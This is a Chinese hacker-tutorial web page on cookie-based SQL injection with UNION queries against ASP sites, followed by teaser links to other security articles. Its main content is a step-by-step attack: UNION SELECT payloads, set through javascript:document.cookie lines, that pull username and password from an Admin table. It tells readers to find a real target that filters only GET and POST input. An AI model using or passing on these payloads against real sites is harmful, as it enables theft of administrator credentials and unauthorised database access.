教你学会Cookie与联合查询的注入
所属分类:
网络安全 / 黑客教程
阅读数:
186
收藏 0赞 0分享
具体的原理与分析过程我就不写了,写起来一大片,大家看的心烦我写的头痛,我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。
具体的原理与分析过程我就不写了,写起来一大片,大家看的心烦我写的头痛,我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。
cookie值是连接后才保存到本机的,也就是关IE后.
前提条件:一、网站没有过滤cookie方式的注入。
二、需事前了解数据库的管理员表段名,计算一下注入文件数据库查询语句在数据库中的列数。
打开数据库,找到Product这个表名,计算字段数为21个。管理员表名为admin 用户与密码字段名为username、password,呵呵没有注入文件,我们可以自己构造一个测试方便大家的理解。
构造如下简单注入ASP,当然我没作什么严格的过滤,也就是接受任何方式的提交。.
//调用数据库连接文件
")
else
%>
//反回指针处的内容,选取的字段与管理员的用户密码类型要相同
找前图中的ID=55
构造联合查询语句
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin 将6,2分别用username、password替换
来试试cookie注入。找个目标,注入点结构与前面相近就不再分析了,仅过滤了post与get注入.
步骤一:重新打开IE,先连接到需注入的网站http://127.0.0.1/nf,也就是去除前面的链接值。注意:不要直接在前面图中的链接处操作,可以会不成功噢。
步骤二:清空地址处IE,再次在地址中加入如下
javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,
2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))
再次清空IE打入http://127.0.0.1/nf/ProductShow.asp
步骤四:重复步骤一.注意此步骤必需操作,很多人失败就在这里。
步骤五:清空地址处IE,再次在地址中如下代码
javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,
username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))
步骤六、再次清空地址处IE。http://127.0.0.1/nf/ProductShow.asp
好了全文结束。
中小网站如何对付拒绝服务攻击
DoS(Denial of Service)是一种使用合理的效劳恳求占用过多的效劳资源,从而使合法用户无法得到效劳呼应的网络进犯行为。
收藏 0赞 0分享
黑客专家教你设计不易破解的密码以及注意事项
美国一家密码管理应用提供商SplashData 公司近期总结出2012年度最差的25个密码,美国《纽约时报》作家尼克尔·佩尔荣斯近日撰文指出,密码要想不被黑客猜中,有几点非常重要的注意事项。
收藏 0赞 0分享
神秘的影子帐号揭秘
见名思义,帐号具有隐蔽性,不容易被发现(只是在一定程度上)。即一般的菜鸟发现不了
收藏 0赞 0分享
黑客基础知识 常用命令和快捷键大全
很多用户可能都知道在DOS模式下可以进行命令行的黑客命令操作,可总有用户不知道从哪里下手,看了下文您应该可以有一点启示
收藏 0赞 0分享
删除用户时提示无法在内置账户上运行此操作
一般情况写黑客在入侵服务器后都会添加新的用户或者和设置后门程序.如果大家在使用服务器的过程中发现,出现了不能删除的用且账号不能够正常删除提示无法在内置账号进行此操作。
收藏 0赞 0分享
使用搜索引擎搜索资料的方法
学习使用搜索引擎是电脑学习者必须掌握的一项技能,我们平时碰到的很多问题都可以在搜索引擎里面找到答案,比如我们要下载某个游戏,直接搜索那个游戏名字即可,非常的方便。下面,让我们一起来学习一下关于搜索引擎的使用方法。
收藏 0赞 0分享
查看更多